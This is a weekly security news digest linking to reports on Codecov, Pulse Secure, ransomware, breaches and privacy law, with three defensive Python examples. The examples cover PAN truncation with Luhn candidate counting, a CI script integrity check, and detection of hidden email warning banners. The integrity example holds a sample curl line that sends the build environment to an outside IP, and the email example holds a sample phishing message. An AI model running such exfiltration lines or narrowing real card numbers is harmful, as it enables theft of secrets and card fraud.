This Week's [in]Security - Issue 212
25 Apr 2021.
Welcome to This Week’s [in]Security. P2PE Solution Aid. More on 8-digit BINs. Supply-Chain Backdoors: Codecov, Passwordstate, SolarWinds. New breaches: Facebook, Apple(?), ClearVoice. New Ransomware. Follow-ups & Fall-out. Privacy: Normalizing breaches. FLoC Adverse. Laws & Regs: Canada: Bills C-10 & 11, regulating apps. US. UK, EU, HK. NIST IoT & ICS. CISv8. Defense: More Nation-State Patching, Moxie vs Cellebrite, Death to IoT, Passwordless, Mario and DevSecOps!? Vulnerabilities: Pulse, Chrome, SonicWall ZeroDays, Supply-chains, CyberGames, Clubhouse, AirDrop, Docker Images, QNAP, Tesla. Updatable Encryption. Breaking Enigma. Cybercrime: Trends: TLS, QR, Sextortion, Ads, 7-Zip, ToxicEye, Pink, Fake DirectX12. Nation States. Crypto-skimming. Crime. Other Risks: Unethical patching, Social Media, Chips, Deepfake geography, Bounties, Resets, No bars! Health, Safety & Environment. Covid-19: Spread, Curves, Waves, and Variants. Response. Immunity. Covid Ugly. Covid Compliance. And more.
PCI Compliance and Payments
News and announcements relating to Payment Security, PCI, Card Brands, Payments, Payment Malware and Fraud, and Payment Related Compliance.
- The PCI Security Standards Council has published an optional P2PE Solution Inventory Template. Blog article https://blog.pcisecuritystandards.org/qa-on-the-optional-p2pe-solution-inventory-template and template https://www.pcisecuritystandards.org/documents/PCI_SSC_P2PE_Solution_Inventory_Template_Apr2021.docx
- Payment Security in South Africa: A Discussion with Stakeholders https://blog.pcisecuritystandards.org/payment-security-in-south-africa-a-discussion-with-stakeholders
- 8-Digit BINs could be a compliance problem for data-in-transit as well https://controlgap.com/blog/The-8-Digit-BINs-Strike-Again
- With the Deadline Having Passed, Less Than Half of Sellers Comply With Gas Pump EMV https://www.digitaltransactions.net/with-the-deadline-having-passed-less-than-half-of-sellers-comply-with-gas-pump-emv/
- San Francisco Becomes the Fourth Transit System to Adopt Cubic’s Contactless Payment App https://www.digitaltransactions.net/san-francisco-becomes-the-fourth-transit-system-to-adopt-cubic-transportation-systems-contactless-payment-app/
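The 8-digit BIN item above turns on how much of a PAN a truncation policy leaves readable. The block below is an added example, not code from the linked post or from the PCI SSC: it truncates a PAN under a keep-leading/keep-trailing policy, checks whether the full 8-digit BIN survives, and counts how many Luhn-valid PANs are consistent with the truncated value. The sample PAN 4111111111111111 is a widely used test number, and the 6/4 and 8/4 policies are illustrative only; PCI DSS 3.2.1 Requirement 3.3 permits at most the first six and last four digits to be displayed, and what the 8-digit BIN does to that rule is exactly what the linked post discusses.

```python
import itertools

# Constructed sample: a widely used Visa test PAN (assumption: not a live card).
SAMPLE_PAN = "4111111111111111"


def luhn_valid(pan: str) -> bool:
    """Return True if the digit string passes the Luhn (mod 10) check."""
    total = 0
    for idx, ch in enumerate(reversed(pan)):
        d = int(ch)
        if idx % 2 == 1:          # every second digit from the right is doubled
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def truncate_pan(pan: str, keep_leading: int, keep_trailing: int, mask: str = "X") -> str:
    """Replace everything except the first keep_leading and last keep_trailing digits."""
    if not pan.isdigit():
        raise ValueError("PAN must be digits only")
    hidden = len(pan) - keep_leading - keep_trailing
    if hidden < 1:
        raise ValueError("policy would leave the whole PAN visible")
    return pan[:keep_leading] + mask * hidden + pan[-keep_trailing:]


def bin_fully_visible(truncated: str, bin_length: int = 8, mask: str = "X") -> bool:
    """True if the routing BIN (first bin_length digits) survived truncation intact."""
    return mask not in truncated[:bin_length]


def count_luhn_candidates(truncated: str, mask: str = "X") -> int:
    """Brute-force how many Luhn-valid PANs match a truncated value.

    Each hidden digit multiplies the search space by 10 and the Luhn check
    divides it by 10 once, so k hidden digits leave 10**(k-1) candidates.
    Intended for small k; the 8/4 case on a 16-digit PAN is 10,000 combinations.
    """
    positions = [i for i, c in enumerate(truncated) if c == mask]
    digits = list(truncated)
    count = 0
    for combo in itertools.product("0123456789", repeat=len(positions)):
        for pos, d in zip(positions, combo):
            digits[pos] = d
        if luhn_valid("".join(digits)):
            count += 1
    return count


if __name__ == "__main__":
    for lead, trail in ((6, 4), (8, 4)):
        t = truncate_pan(SAMPLE_PAN, lead, trail)
        print(f"{lead}/{trail}: {t}  BIN visible: {bin_fully_visible(t)}  "
              f"hidden digits: {t.count('X')}")
    # Only the 8/4 case is brute-forced here; 6/4 would need 10**6 iterations.
    print("Luhn-valid candidates for 8/4:",
          count_luhn_candidates(truncate_pan(SAMPLE_PAN, 8, 4)))
```

Under first-6/last-4 the 8-digit BIN is cut in half; under first-8/last-4 it is intact but only four digits of a 16-digit PAN stay hidden, which the Luhn check narrows to 1,000 candidates (the 6/4 policy leaves 100,000). That is the practical reason a truncated value with a longer visible prefix deserves the same handling as the fields it travels with.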
Breaches / Ransomware / Leaks
Covering breaches, leaks, data exposures, ransomware (as potential breach), and their fallout.
Big Hacks, supply-chain compromises and widely used backdoors:
- Backdoor Found in Codecov Bash Uploader https://www.schneier.com/blog/archives/2021/04/backdoor-found-in-codecov-bash-uploader.html
- Codecov dev tool warns of stolen credentials from compromised script, undiscovered for two months https://www.theregister.com/2021/04/19/codecov_warns_of_stolen_credentials/
- Hundreds of networks reportedly hacked in Codecov supply-chain attack https://www.bleepingcomputer.com/news/security/hundreds-of-networks-reportedly-hacked-in-codecov-supply-chain-attack/
- HashiCorp is the latest victim of Codecov supply-chain attack https://www.bleepingcomputer.com/news/security/hashicorp-is-the-latest-victim-of-codecov-supply-chain-attack/
- Backdoored password manager Passwordstate stole data from as many as 29K enterprises https://arstechnica.com/gadgets/2021/04/hackers-backdoor-corporate-password-manager-and-steal-customer-data/, https://www.bleepingcomputer.com/news/security/passwordstate-password-manager-hacked-in-supply-chain-attack/
- Researchers Find Additional Infrastructure Used By SolarWinds Hackers https://thehackernews.com/2021/04/researchers-find-additional.html
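The Codecov items above come down to a script that CI jobs fetch and execute (the `curl ... | bash` pattern) and that was silently modified to post the build environment to an outside host. The block below is an added example, not Codecov's uploader or its advisory: it shows the two checks a pipeline can make before running a fetched script, comparing it against a pinned SHA-256 and scanning it for lines that send `env` output to a host outside an allow-list. The "scripts", the pinned hash, the host codecov.example and the address 203.0.113.10 (an RFC 5737 documentation range) are all constructed for the example; the tampered line is shaped like the addition Codecov described, not a copy of it.

```python
import hashlib
import hmac
import re

# Constructed sample "uploader" as the consumer pinned it (assumption, not the real script).
CLEAN_SCRIPT = (
    b"#!/usr/bin/env bash\n"
    b"set -euo pipefail\n"
    b'curl -fsS https://codecov.example/upload -F token="$CODECOV_TOKEN" -F file=@coverage.xml\n'
)
# The digest a pipeline records once, out of band, and compares against on every run.
PINNED_SHA256 = hashlib.sha256(CLEAN_SCRIPT).hexdigest()

# Constructed tampered copy: same script plus one line that posts the environment elsewhere.
TAMPERED_SCRIPT = CLEAN_SCRIPT + (
    b'curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://203.0.113.10/upload/v2 || true\n'
)

ALLOWED_HOSTS = {"codecov.example"}          # hosts the script is expected to talk to
URL_RE = re.compile(r"https?://([A-Za-z0-9.\-]+)(?::\d+)?", re.I)
ENV_DUMP_RE = re.compile(r"\$\(\s*(env|printenv)\b|\bprintenv\b|\benv\s*\|", re.I)
TRANSFER_RE = re.compile(r"\b(curl|wget)\b", re.I)


def verify_pinned(content: bytes, expected_sha256: str) -> bool:
    """Constant-time comparison of the fetched script against the pinned digest."""
    actual = hashlib.sha256(content).hexdigest()
    return hmac.compare_digest(actual, expected_sha256.lower())


def find_exfil_lines(script: str, allowed_hosts=ALLOWED_HOSTS) -> list:
    """Return (line_no, unexpected_hosts, line) for transfers to hosts outside the
    allow-list or transfers that dump the process environment."""
    findings = []
    for n, line in enumerate(script.splitlines(), 1):
        if not TRANSFER_RE.search(line):
            continue
        hosts = {h.lower() for h in URL_RE.findall(line)}
        unexpected = hosts - {h.lower() for h in allowed_hosts}
        dumps_env = bool(ENV_DUMP_RE.search(line))
        if unexpected or dumps_env:
            findings.append((n, ",".join(sorted(unexpected)) or "-", line.strip()))
    return findings


def safe_to_run(content: bytes, expected_sha256: str) -> bool:
    """Gate for a CI step: run only if the digest matches and no exfil pattern is present."""
    if not verify_pinned(content, expected_sha256):
        return False
    return not find_exfil_lines(content.decode("utf-8", "replace"))


if __name__ == "__main__":
    for name, body in (("clean", CLEAN_SCRIPT), ("tampered", TAMPERED_SCRIPT)):
        print(name, "pinned hash ok:", verify_pinned(body, PINNED_SHA256),
              "findings:", find_exfil_lines(body.decode()))
```

The hash check is the one that catches the Codecov case outright: the served script no longer matched the published digest. The pattern scan is a second, weaker net for the day the pinned hash is updated without anyone reading the diff.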
New Breaches:
- A New Facebook Bug Exposes Millions of Email Addresses https://www.wired.com/story/new-facebook-bug-exposes-millions-of-email-addresses
- REvil ransomware gang claims it stole top-secret tech designs – including Apple lappies – from Quanta Computer https://www.theregister.com/2021/04/21/ransomware_gang_extorts_apple/
- Brace yourselves. Facebook has a new mega-leak on its hands https://arstechnica.com/gadgets/2021/04/tool-links-email-addresses-to-facebook-accounts-at-scale/
- Logins for 1.3 million Windows RDP servers collected from hacker market https://www.bleepingcomputer.com/news/security/logins-for-13-million-windows-rdp-servers-collected-from-hacker-market/
- ClearVoice Surveys - 15,074,786 breached accounts https://haveibeenpwned.com/PwnedWebsites#ClearVoiceSurveys
- Phone House España - 5,223,350 breached accounts https://haveibeenpwned.com/PwnedWebsites#PhoneHouse
- Volunteer-run pirate Manga website attacked, loses 3M hashed passwords, has ‘nobody’ to fix the mess https://www.theregister.com/2021/04/26/mangadex_data_breach/ and https://haveibeenpwned.com/PwnedWebsites#MangaDex
- ER Physician Association Hacked https://www.databreachtoday.com/er-physician-association-hacked-a-16453
- Geico data breach exposed customers' driver's license numbers https://www.bleepingcomputer.com/news/security/geico-data-breach-exposed-customers-drivers-license-numbers/
- Kansas Department of Labor looking into possible data breach https://www.databreaches.net/kansas-department-of-labor-looking-into-possible-data-breach/
- Al: Election Data Breach Story Renews Press Freedom Debate in Albania https://www.databreaches.net/al-election-data-breach-story-renews-press-freedom-debate-in-albania/
- AU: Service NSW kept victims in dark after hackers stole personal data https://www.databreaches.net/au-service-nsw-kept-victims-in-dark-after-hackers-stole-personal-data/
- FL: Hackers post 26,000 Broward school files online https://www.databreaches.net/fl-hackers-post-26000-broward-school-files-online/
New Ransomware and "Incidents":
- Illinois Attorney General’s Office hit by ransomware? State investigating. https://www.databreaches.net/illinois-attorney-generals-office-hit-by-ransomware-state-investigating/
Follow-ups and fall-out:
- Ca: Court approves data breach settlements with BMO, CIBC https://www.databreaches.net/ca-court-approves-data-breach-settlements-with-bmo-cibc/
- Hacker leaks 20 million alleged BigBasket user records for free https://www.bleepingcomputer.com/news/security/hacker-leaks-20-million-alleged-bigbasket-user-records-for-free/
- ShopBack - 20,529,819 breached accounts https://haveibeenpwned.com/PwnedWebsites#ShopBack
- School Nutrition Vendor Sued for Compromise of 867,209 K-12 Student Records https://www.databreaches.net/school-nutrition-vendor-sued-for-compromise-of-867209-k-12-student-records/
Privacy
Articles about privacy related news, risks, and trends.
- Facebook leaks strategy to numb reaction to data scraping incidents https://www.bleepingcomputer.com/news/security/facebook-leaks-strategy-to-numb-reaction-to-data-scraping-incidents/
- Would be so cool if everyone normalized these pesky data leaks, says data-leaking Facebook in leaked memo https://www.theregister.com/2021/04/20/facebook_data_breach/
- Microsoft disables Google's FLoC tracking in Microsoft Edge, for now https://www.bleepingcomputer.com/news/microsoft/microsoft-disables-googles-floc-tracking-in-microsoft-edge-for-now/
- What the FLoC?! https://scotthelme.co.uk/what-the-floc/
- Samsung wants to make sure nobody’s tracking you with its SmartTags https://www.theverge.com/2021/4/20/22392924/samsung-smartags-tracker-bixby-privacy-smartthings
- TikTok vs Douyin A Security and Privacy Analysis https://citizenlab.ca/2021/03/tiktok-vs-douyin-security-privacy-analysis/
- Cloudflare obtains new ISO/IEC 27701:2019 privacy certification and what that means for you https://blog.cloudflare.com/iso-27701-privacy-certification/
- CryptGPU: Fast Privacy-Preserving Machine Learning on the GPU, by Sijun Tan and Brian Knott and Yuan Tian and David J. Wu https://eprint.iacr.org/2021/533
Laws, Regulations, Platforms, Standards, and Public Policy
News about laws, regulations, platform rules, and standards affecting security, privacy, technology, and public interest.
Canada:
- Not Just User Generated Content: Liberal Government Also Want the CRTC to Regulate Apps Under Bill C-10 https://www.michaelgeist.ca/2021/04/not-just-user-generated-content-liberals-also-want-the-crtc-to-regulate-apps-under-bill-c-10/
- Bill C-11 Explained https://citizenlab.ca/2021/04/bill-c-11-explained/
- Freedom of Expression Under Attack: The Liberal Government Moves to Have the CRTC Regulate All User Generated Content https://www.michaelgeist.ca/2021/04/freedom-of-expression-under-attack-the-liberal-government-moves-to-have-the-crtc-regulate-all-user-generated-content/
- Canada’s Proposed Privacy Law Reforms Are Not Enough: A Path to Improving Organizational Transparency and Accountability https://citizenlab.ca/2021/04/canadas-proposed-privacy-law-reforms-are-not-enough-improving-organizational-transparency-and-accountability-bill-c11/
- The real winners of Thursday's CRTC decision? Telecom companies, observers say https://www.cbc.ca/news/business/crtc-mvno-reaction-1.5990465
- The Law Bytes Podcast, Episode 84: Dwayne Winseck and Ben Klass on Canada’s Wireless Woes https://www.michaelgeist.ca/2021/04/law-bytes-podcast-episode-84/
US:
- EFF and ACLU Ask Supreme Court to Review Case Against Warrantless Searches of International Travelers’ Phones and Laptops https://www.eff.org/press/releases/eff-and-aclu-ask-supreme-court-review-case-against-warrantless-searches-international
- When Is Online Nastiness Illegal? https://www.nytimes.com/2021/04/23/technology/online-speech.html
- Your Service Provider’s Terms of Service Shouldn’t Overrule Your Fourth Amendment Rights https://www.eff.org/deeplinks/2021/04/your-service-providers-terms-service-shouldnt-overrule-your-fourth-amendment
- As States Offer Data Breach ‘Safe Harbors,’ Not All Companies Are Receptive https://www.databreaches.net/as-states-offer-data-breach-safe-harbors-not-all-companies-are-receptive/
- Florida House of Representatives Passes Florida Privacy Protection Act https://epic.org/2021/04/florida-house-of-representativ.html
- EFF Sues Proctorio on Behalf of Student It Falsely Accused of Copyright Infringement to Get Critical Tweets Taken Down https://www.eff.org/press/releases/eff-sues-proctorio-behalf-student-it-falsely-accused-copyright-infringement-get
- One judge turned Waco, Texas into the go-to city for Big Tech patent lawsuits, with nearly 800 cases in the past year, and no end in sight https://www.businessinsider.com/patent-lawsuits-trolls-moving-texas-waco-new-judge-big-tech-2021-4
- Reddit faces lawsuit for failing to remove child sexual abuse material https://www.theverge.com/2021/4/25/22399306/reddit-lawsuit-child-sexual-abuse-material-fosta-sesta-section-230
World:
- Europe Proposes Strict Rules for Artificial Intelligence https://www.nytimes.com/2021/04/16/business/artificial-intelligence-regulation.html
- TikTok sued for billions over children’s data by former children’s commissioner https://www.independent.co.uk/life-style/gadgets-and-tech/tiktok-billions-lawsuit-illegal-children-data-b1835142.html
- Why Europe Is Hard on Big Tech https://www.nytimes.com/2021/04/22/technology/europe-tech-regulations.html
- Bad software sent postal workers to jail, because no one wanted to admit it could be wrong https://www.theverge.com/2021/4/23/22399721/uk-post-office-software-bug-criminal-convictions-overturned
- Won't somebody please think of the children!!! UK to mount fresh assault on end-to-end encryption in Facebook https://www.theregister.com/2021/04/19/uk_anti_encryption/
- Hong Kong's zealous anti-doxxing campaign could make it even easier to hide dirty money in the city https://www.cnn.com/2021/04/19/business/hong-kong-companies-registry-dst-intl-hnk/index.html
Standards News:
- NIST is updating its Industrial Control Systems (ICS) security guidance, SP 800-82 Rev. 3, to incorporate lessons learned and is accepting comments on the draft until May 28th https://csrc.nist.gov/publications/detail/sp/800-82/rev-3/draft
- NIST’s National Cybersecurity Center of Excellence (NCCoE) preliminary draft of IoT Special Publication (SP) 1800-32, Volumes A and B, is open for comments until May 24th https://csrc.nist.gov/publications/detail/sp/1800-32/draft
- CIS Controls v8 https://www.sans.org/blog/cis-controls-v8
Defense / Techniques / Solutions
Covering developments and opportunities that may help improve security.
- Brit authorities could legally do an FBI and scrub malware from compromised boxen without your knowledge https://www.theregister.com/2021/04/19/ncsc_exchange_server_legal_powers_question/
- Emotet malware forcibly removed today by German police update https://www.databreaches.net/emotet-malware-forcibly-removed-today-by-german-police-update/
- What COVID-19 Taught Us: Prepping Cybersecurity for the Next Crisis https://threatpost.com/covid-19-prepping-cybersecurity-crisis/165472/
- Windows 10 now lets you seamlessly run Linux GUI apps https://www.bleepingcomputer.com/news/microsoft/windows-10-now-lets-you-seamlessly-run-linux-gui-apps/
- Signal app's Moxie says it's possible to sabotage Cellebrite's phone-probing tools with booby-trapped file https://www.theregister.com/2021/04/21/signal_cellebrite/, https://arstechnica.com/information-technology/2021/04/in-epic-hack-signal-developer-turns-the-tables-on-forensics-firm-cellebrite/
- New FIDO Protocol Simplifies IoT Device Onboarding https://www.databreachtoday.com/new-fido-protocol-simplifies-iot-device-onboarding-a-16449
- UK.gov wants mobile makers to declare death dates for their new devices from launch https://www.theregister.com/2021/04/21/ukgov_death_dates_smartphones_iot_security/
- Passwordless: More Mirage Than Reality https://thehackernews.com/2021/04/passwordless-more-mirage-than-reality.html
- How we fought bad apps and developers in 2020 https://security.googleblog.com/2021/04/how-we-fought-bad-apps-and-developers.html
- Honeypot analysis: Base64 Hashes Used in Web Scanning, (Sat, Apr 24th) https://isc.sans.edu/diary/rss/27346
- Designing sockfuzzer, a network syscall fuzzer for XNU https://googleprojectzero.blogspot.com/2021/04/designing-sockfuzzer-network-syscall.html
- Meet Thistle, the startup that wants to secure billions of IoT devices https://arstechnica.com/information-technology/2021/04/meet-thistle-the-startup-that-wants-to-secure-billions-of-iot-devices/
- Looking for Greater Security Culture? Ask an 8-Bit Plumber https://www.darkreading.com/application-security/looking-for-greater-security-culture-ask-an-8-bit-plumber/a/d-id/1340751
- MITRE Engenuity ATT&CK® Evaluation proves Microsoft Defender for Endpoint stops advanced attacks across platforms https://www.microsoft.com/security/blog/2021/04/21/mitre-engenuity-attck-evaluation-proves-microsoft-defender-for-endpoint-stops-advanced-attacks-across-platforms/
Bugs / Design Flaws / Vulnerabilities / Research
Articles about newly discovered vulnerabilities and research.
- CVE-2021-22893: Zero-Day Vulnerability in Pulse Connect Secure Exploited in the Wild https://www.tenable.com/blog/cve-2021-22893-zero-day-vulnerability-in-pulse-connect-secure-exploited-in-the-wild
- Update Your Chrome Browser ASAP to Patch a Week Old Public Exploit https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html
- WARNING: Hackers Exploit Unpatched Pulse Secure 0-Day to Breach Organizations https://thehackernews.com/2021/04/warning-hackers-exploit-unpatched-pulse.html
- Google Chrome Hit in Another Mysterious Zero-Day Attack https://www.securityweek.com/google-chrome-hit-another-mysterious-zero-day-attack
- SonicWall warns customers to patch 3 zero-days exploited in the wild https://www.bleepingcomputer.com/news/security/sonicwall-warns-customers-to-patch-3-zero-days-exploited-in-the-wild/
- Three Zero-Day Flaws in SonicWall Email Security Product Exploited in Attacks https://www.securityweek.com/three-zero-day-flaws-sonicwall-email-security-product-exploited-attacks
- Spotlight on Cybercriminal Supply Chains https://threatpost.com/spotlight-on-the-cybercriminal-supply-chains/165552/
- US Cyber Games announced to put together a team for capture-the-flag competitions (very cool, but "cyberathletes"?) https://www.uscybergames.com/
- A Clubhouse Bug Let People Lurk in Rooms Invisibly https://www.wired.com/story/clubhouse-bug-lurkers-ghost
- Apple, you've AirDrop'd the ball: Academics detail ways to leak contact info of nearby iThings for spear-phishing https://www.theregister.com/2021/04/22/airdrop_contact_leaks/
- Critical RCE Bug Found in Homebrew Package Manager for macOS and Linux https://thehackernews.com/2021/04/critical-rce-bug-found-in-homebrew.html
- How Safe Are Your Docker Images?, (Thu, Apr 22nd) https://isc.sans.edu/diary/rss/27340
- If you have a QNAP NAS, stop what you're doing right now and install latest updates. Do it before Qlocker gets you https://www.theregister.com/2021/04/22/qnap_nas_ransomware_qlocker_ech0raix/
- Flawed credential storage in top Android apps puts users at risk https://www.comparitech.com/blog/information-security/flawed-credential-storage-android-apps/
- Tesla’s Autopilot is ‘easily’ tricked into working without anyone in the driver’s seat https://www.theverge.com/2021/4/22/22397546/tesla-autopilot-consumer-report-test-no-driver
- Firefox 88 combats window.name privacy abuses https://blog.mozilla.org/security/2021/04/19/firefox-88-combats-window-name-privacy-abuses/
- Mozilla Fixes Firefox Flaw That Allowed Spoofing of HTTPS Browser Padlock https://threatpost.com/mozilla-fixes-firefox-flaw/165501/
- Attackers can hide 'external sender' email warnings with HTML and CSS https://www.bleepingcomputer.com/news/security/attackers-can-hide-external-sender-email-warnings-with-html-and-css/
- Vulnerability Spotlight: Code execution vulnerabilities in PrusaSlicer https://blog.talosintelligence.com/2021/04/vuln-spotlight-.html
- Vulnerability Spotlight: Remote code execution vulnerabilities in Cosori smart air fryer https://blog.talosintelligence.com/2021/04/vuln-spotlight-co.html
- Over 580 WordPress Vulnerabilities Disclosed in 2020: Report https://www.securityweek.com/over-580-wordpress-vulnerabilities-disclosed-2020-report
- Security Researcher Dan Kaminsky Passes Away https://www.securityweek.com/security-researcher-dan-kaminsky-passes-away
- A Composable Look at Updatable Encryption, by Françoise Levy-dit-Vehel and Maxime Roméas https://eprint.iacr.org/2021/538
- Video on breaking the Enigma cipher machine in 2021 cipher text only attack https://www.youtube.com/watch?v=RzWB5jL5RX0
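The "external sender" warning item above works because mail platforms insert their banner as HTML into the message body, where an attacker-supplied `<style>` block or inline style can hide it. The block below is an added example, not from the linked article or from any mail product: it parses a message's HTML, collects stylesheet rules and inline styles that hide content (`display:none`, `visibility:hidden`), and reports whether any of them target the banner's own markup. The sample messages, the banner class `ext-warning` and id `x_ExternalBanner` are constructed for the example; real banner markup differs by platform, so substitute the markers your gateway emits.

```python
import re
from html.parser import HTMLParser

# Constructed sample: phishing body carrying a stylesheet that hides the gateway banner.
HIDDEN_BANNER_MAIL = """<html><head><style>
  #x_ExternalBanner, .ext-warning { display: none !important; }
  p { color: #222; }
</style></head><body>
<div class="ext-warning">CAUTION: This email originated from outside the organization.</div>
<p>Please review the attached invoice and approve payment today.</p>
</body></html>"""

# Constructed sample: an ordinary message that leaves the banner visible.
PLAIN_MAIL = """<html><body>
<div class="ext-warning">CAUTION: This email originated from outside the organization.</div>
<p>Minutes from today's meeting are attached.</p>
</body></html>"""

# Declarations that make content disappear; extend for the way your banner is styled.
HIDING_DECL = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


class _StyleCollector(HTMLParser):
    """Gather <style> text and every element whose inline style hides it."""

    def __init__(self):
        super().__init__()
        self._in_style = False
        self.stylesheets = []
        self.inline_hidden = []      # (tag, id, class) of elements hidden inline

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "style":
            self._in_style = True
        if HIDING_DECL.search(a.get("style", "")):
            self.inline_hidden.append((tag, a.get("id", ""), a.get("class", "")))

    def handle_endtag(self, tag):
        if tag == "style":
            self._in_style = False

    def handle_data(self, data):
        if self._in_style:
            self.stylesheets.append(data)


def _collect(html: str) -> _StyleCollector:
    c = _StyleCollector()
    c.feed(html)
    c.close()
    return c


def hiding_selectors(html: str) -> list:
    """Selectors of stylesheet rules whose declarations hide content."""
    css = "".join(_collect(html).stylesheets)
    found = []
    for rule in css.split("}"):
        if "{" not in rule:
            continue
        selector, decl = rule.split("{", 1)
        if HIDING_DECL.search(decl):
            found.extend(s.strip() for s in selector.split(",") if s.strip())
    return found


def banner_hidden(html: str, banner_markers=("ext-warning", "x_ExternalBanner")) -> bool:
    """True if a hiding rule or inline style targets any of the banner's id/class markers."""
    markers = [m.lower() for m in banner_markers]
    if any(m in sel.lower() for sel in hiding_selectors(html) for m in markers):
        return True
    for _tag, elem_id, classes in _collect(html).inline_hidden:
        haystack = (elem_id + " " + classes).lower()
        if any(m in haystack for m in markers):
            return True
    return False


if __name__ == "__main__":
    for name, body in (("hidden", HIDDEN_BANNER_MAIL), ("plain", PLAIN_MAIL)):
        print(name, "hiding selectors:", hiding_selectors(body),
              "banner hidden:", banner_hidden(body))
```

A gateway rule built on this would quarantine or strip the `<style>` block rather than trust the banner to be seen; the point of the linked article is that the banner alone is not a control, because the attacker controls the rest of the HTML it is pasted into.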
Hacking / Malware / Cybercrime / Exploitation
News covering active trends, alerts, events.
Trends, Alerts, and Events (other than major breaches):
- Half of Q1's malware traffic observed by Sophos was TLS encrypted, hiding inside legit requests to legit services https://www.theregister.com/2021/04/21/sophos_research/
- QR Codes Offer Easy Cyberattack Avenues as Usage Spikes https://threatpost.com/qr-codes-cyberattack-usage-spikes/165526/
- The latest sextortion tactic, how to help your kids prevent and report it https://globalnews.ca/news/7777262/sextortion-cybertip-youth-crime-teen-offenders-nudes-blackmail/
- 120 Compromised Ad Servers Target Millions of Internet Users https://thehackernews.com/2021/04/120-compromised-ad-servers-target.html
- Millions of web surfers are being targeted by a single malvertising group https://arstechnica.com/information-technology/2021/04/malvertisers-use-120-hacked-ad-servers-to-target-millions-of-web-surfers/
- A ransomware gang made $260,000 in 5 days using the 7zip utility https://www.bleepingcomputer.com/news/security/a-ransomware-gang-made-260-000-in-5-days-using-the-7zip-utility/
- Massive Qlocker ransomware attack uses 7zip to encrypt QNAP devices https://www.bleepingcomputer.com/news/security/massive-qlocker-ransomware-attack-uses-7zip-to-encrypt-qnap-devices/
- Cybercriminals Using Telegram Messenger to Control ToxicEye Malware https://thehackernews.com/2021/04/cybercriminals-using-telegram-messenger.html
- WhatsApp Pink malware can now auto-reply to your Signal, Telegram texts https://www.bleepingcomputer.com/news/security/whatsapp-pink-malware-can-now-auto-reply-to-your-signal-telegram-texts/
- Fake Microsoft DirectX 12 site pushes crypto-stealing malware https://www.bleepingcomputer.com/news/security/fake-microsoft-directx-12-site-pushes-crypto-stealing-malware/
- Google Alerts continues to be a hotbed of scams and malware https://www.bleepingcomputer.com/news/security/google-alerts-continues-to-be-a-hotbed-of-scams-and-malware/
- Google Play apps steal texts and pepper you with unauthorized purchases https://arstechnica.com/gadgets/2021/04/google-play-apps-with-700k-installs-steal-texts-and-charge-you-money/
- Malware That Spreads Via Xcode Projects Now Targeting Apple's M1-based Macs https://thehackernews.com/2021/04/malware-spreads-via-xcode-projects-now.html
Nation State Actors:
- China broke into govt, defense, finance networks via zero-day in Pulse Secure VPN gateways? No way https://www.theregister.com/2021/04/20/china_pulse_connect_secure_vpn/
- Japan accuses Chinese military of cyber-attacks on its space agency https://www.theregister.com/2021/04/21/japan_accuses_china_of_attacking_jaxa/
- Lazarus APT Hackers are now using BMP images to hide RAT malware https://thehackernews.com/2021/04/lazarus-apt-hackers-are-now-using-bmp.html
- Nation-State Actor Linked to Pulse Secure Attacks https://www.databreachtoday.com/nation-state-actor-linked-to-pulse-secure-attacks-a-16437
- North Korean hackers adapt web skimming for stealing Bitcoin https://www.bleepingcomputer.com/news/security/north-korean-hackers-adapt-web-skimming-for-stealing-bitcoin/
- On North Korea’s Cyberattack Capabilities https://www.schneier.com/blog/archives/2021/04/on-north-koreas-cyberattack-capabilities.html
- Facebook Busts Palestinian Hackers' Operation Spreading Mobile Spyware https://thehackernews.com/2021/04/facebook-busts-palestinian-hackers.html
- Facebook Says Palestinian Intelligence Used Platform to Spy on Citizens https://www.securityweek.com/facebook-says-palestinian-intelligence-used-platform-spy-citizens
Crime & Arrests, etc.:
- Did Huawei Eavesdrop on KPN Mobile Network? https://www.databreachtoday.com/blogs/did-huawei-eavesdrop-on-kpn-mobile-network-p-3019
- FBI used facial recognition to identify a Capitol rioter from his girlfriend’s Instagram posts https://www.theverge.com/2021/4/21/22395323/fbi-facial-recognition-us-capital-riots-tracked-down-suspect
- FBI Warns Cyber Criminals Are Using Fake Job Listings to Target Applicants’ Personally Identifiable Information https://www.databreaches.net/fbi-warns-cyber-criminals-are-using-fake-job-listings-to-target-applicants-personally-identifiable-information/
- Guelph police use their own ruse to get back iPad bought with fake cash https://globalnews.ca/news/7783071/toronto-man-ipad-fake-money-guelph/
- Pupil hacked into computer and changed their grades after teacher left their password on a note stuck to a laptop – as GCHQ begins cyber security training for school staff https://www.databreaches.net/pupil-hacked-into-computer-and-changed-their-grades-after-teacher-left-their-password-on-a-note-stuck-to-a-laptop-as-gchq-begins-cyber-security-training-for-school-staff/
Other Security / Risk
Articles covering other types of risks.
- Linux bans University of Minnesota for committing malicious code in unethical study https://www.bleepingcomputer.com/news/security/linux-bans-university-of-minnesota-for-committing-malicious-code/, and https://blog.erratasec.com/2021/04/ethics-university-of-minnesotas-hostile.html
- The social networks ‘designed to tear us apart’ – podcasts of the week https://www.theguardian.com/tv-and-radio/2021/apr/23/the-social-networks-designed-to-tear-us-apart-podcasts-of-the-week
- A Computer Chip Shortage Has Hobbled the Auto Industry https://www.nytimes.com/2021/04/23/business/auto-semiconductors-general-motors-mercedes.html
- A growing problem of ‘deepfake geography’: How AI falsifies satellite images https://scienmag.com/a-growing-problem-of-deepfake-geography-how-ai-falsifies-satellite-images/
- American Police Are Inadequately Trained https://www.theatlantic.com/politics/archive/2021/04/daunte-wright-and-crisis-american-police-training/618649/
- Beware of bug bounty hidden risk and liabilities https://www.darkreading.com/vulnerabilities---threats/beware-the-bug-bounty/a/d-id/1340658
- Cisco says computer chip shortage to last six months https://www.bbc.co.uk/news/technology-56847518
- Russian Security Vendor Positive Technologies Dropped From MAPP Member List https://www.securityweek.com/russian-security-vendor-positive-technologies-responds-us-sanctions
- Cost of Account Unlocks, and Password Resets Add Up https://thehackernews.com/2021/04/cost-of-account-unlocks-and-password.html
- The Delicate Balance of Security Versus Usability https://blog.isc2.org/isc2_blog/2021/04/the-delicate-balance-of-security-versus-usability.html
